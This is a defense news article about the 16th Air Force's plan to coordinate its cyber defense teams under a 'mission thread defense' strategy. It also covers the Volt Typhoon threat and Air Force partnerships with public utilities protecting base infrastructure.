AFA 2025 — The Air Force’s primary cyber unit is developing a new strategy to better synchronize the work of different groups of cyber defenders, with a particular focus on critical infrastructure and networks, according to the unit’s commander.
“Prior to this, we’ve always kind of looked at them [cybersecurity teams] in separate missions, but they’re really doing the same thing in a different way. We want to harmonize that better,” Lt. Gen. Thomas Hensley, commander of 16th Air Force, said during a panel presentation at the annual Air and Space Forces Association conference at National Harbor, Md.
Currently, cyber defense missions are undertaken by at least two different sets of teams. There are the local defenders, known as cybersecurity service providers or CSSPs, which perform persistent defense of systems. Then there are cyber protection teams, defensive teams focused on hunting adversaries within the network. They have been described as cyber SWAT teams that have specialized kits to eradicate adversary intrusions on networks.
RELATED: After cuts to DoD’s cyber workforce, experts see short-term readiness risk, but also opportunity
The move for greater harmonization between the two groups, a spokesperson for the 16th said, came out of work the 16th has already done on what they called “mission thread defense.” That refers to an overarching strategy and process flow of information and focuses on protecting critical operational sequences that can span multiple systems and components — to include hardware, software, open vulnerabilities programmable logic controllers, data dependencies, sub systems and architecture.
“In the increasingly complex and competitive global security environment, mission thread defense protects our systems from any cyber threats, disruptions, and failures at any time. It ensures that essential capabilities, [such as] things that keep America safe, remain functional even under attack, protecting both our homeland and operational success by focusing on endurance and integrity of mission-critical operations,” the spokesperson said. “Mission thread defense safeguards critical operations from the beginning to the end of a mission. It enhances system resiliency, mitigates threats, and safeguards steady operations even under cyberattack or system failure.”
Base Defense And Public Utilities
Historically, the military has focused its defense on Internet Protocol-based networks, but in the age of countless Internet-of-Things devices and digitally maintained critical infrastructure, the threat landscape has widen dramatically.
Volt Typhoon, for instance, was purported Chinese malware discovered inside US critical infrastructure using a technique in the cybersecurity world dubbed “living off the land,” which means it’s using legitimate tools organic to the systems for malicious purposes. What has particularly alarmed officials regarding Volt Typhoon is the paradigm shift of Chinese threats moving from espionage and intellectual property theft to holding critical infrastructure at risk, likely to thwart a US mobilization response to Chinese activity in the Pacific.
Part of the issue is many of these critical infrastructure systems are owned and operated by public utilities, not the US government, even on military bases.
“Looking at the base defense itself, we can do all that we can to defend those bases, but realize that those bases rely on public utilities,” Hensley said. “If those public utilities are attacked, we’ll have a week, maybe two weeks, of generator power to keep the missions going, but then that’s it. We’re out. How do we protect the public utilities that are feeding the bases so that we can continue to fight?”
He explained the Air Force is working through several cooperative research and development agreements with public utility companies at a variety of strategic locations and bases to help improve defenses and partnership with the private sector.
Some include intelligence sharing to inform utilities of adversary activity in their networks, others involve sharing best practices to eradicate adversaries, and some more sensitive agreements allow the Air Force to put sensors on utility systems for persistent monitoring.